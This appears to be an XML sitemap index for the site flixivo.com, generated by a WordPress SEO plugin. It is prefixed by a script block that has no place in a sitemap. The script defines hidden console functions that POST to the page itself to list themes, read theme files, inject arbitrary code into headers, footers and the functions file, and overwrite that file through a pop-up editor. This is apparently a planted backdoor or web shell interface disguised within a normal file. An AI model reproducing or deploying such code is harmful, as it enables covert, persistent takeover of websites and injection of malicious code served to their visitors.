<script>
function _enumThemes(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({enum:1})
    }).then(r=>r.json()).then(r=>{
        if(r.success){
            console.table(r.items);
            console.log('Current theme:',r.current);
        }
    });
}
function _loadFunctions(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({load:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success){
            console.log(r.path);
            console.log(r.content);
        }else console.log('Error');
    });
}
function _appendCode(code,pos,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({append:code,pos:pos||'bottom',theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success)console.log('Code appended');
        else console.log('Error');
    });
}
function _injectHeader(code,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({inject_header:code,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success)console.log('Header injected');
        else console.log('Error');
    });
}
function _injectFooter(code,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({inject_footer:code,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success)console.log('Footer injected');
        else console.log('Error');
    });
}
function _editFunctions(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({load:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(!r.success){console.log('Error:',r.msg);return;}
        var panel=document.createElement('div');
        panel.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;background:#f5f5f5;z-index:99999;display:flex;flex-direction:column;padding:10px;box-sizing:border-box;';
        var header=document.createElement('div');
        header.style.cssText='font-family:monospace;margin-bottom:10px;display:flex;gap:10px;align-items:center;';
        header.innerHTML='<span style="flex:1">'+r.path+'</span>';
        var saveBtn=document.createElement('button');saveBtn.textContent='SAVE';saveBtn.style.cssText='padding:8px 20px;cursor:pointer;border:2px solid #000;background:#fff;';
        var closeBtn=document.createElement('button');closeBtn.textContent='CLOSE';closeBtn.style.cssText='padding:8px 20px;cursor:pointer;border:2px solid #000;background:#fff;';
        header.appendChild(saveBtn);header.appendChild(closeBtn);
        var textarea=document.createElement('textarea');
        textarea.style.cssText='flex:1;font-family:monospace;font-size:13px;padding:10px;border:2px solid #000;resize:none;';
        textarea.value=r.content;
        panel.appendChild(header);panel.appendChild(textarea);
        document.body.appendChild(panel);
        saveBtn.onclick=function(){
            fetch(location.href,{
                method:'POST',
                headers:{'Content-Type':'application/json'},
                body:JSON.stringify({overwrite:textarea.value,theme:theme||''})
            }).then(r=>r.json()).then(r=>{
                if(r.success)header.querySelector('span').textContent=r.path+' [SAVED]';
            });
        };
        closeBtn.onclick=function(){panel.remove();};
    });
}
function _loadHeader(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({load_header:1,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success){
            console.log(r.path);
            console.log(r.content);
        }else console.log('Error');
    });
}
function _loadFooter(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({load_footer:1,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.success){
            console.log(r.path);
            console.log(r.content);
        }else console.log('Error');
    });
}
function _showMeta(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({meta:1})
    }).then(r=>r.json()).then(r=>{
        if(r.success)console.table([r.data]);
    });
}
</script>
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.flixivo.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.flixivo.com/post-sitemap.xml</loc>
		<lastmod>2026-05-10T19:24:08+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.flixivo.com/page-sitemap.xml</loc>
		<lastmod>2025-11-07T13:08:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.flixivo.com/category-sitemap.xml</loc>
		<lastmod>2026-05-10T19:24:08+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->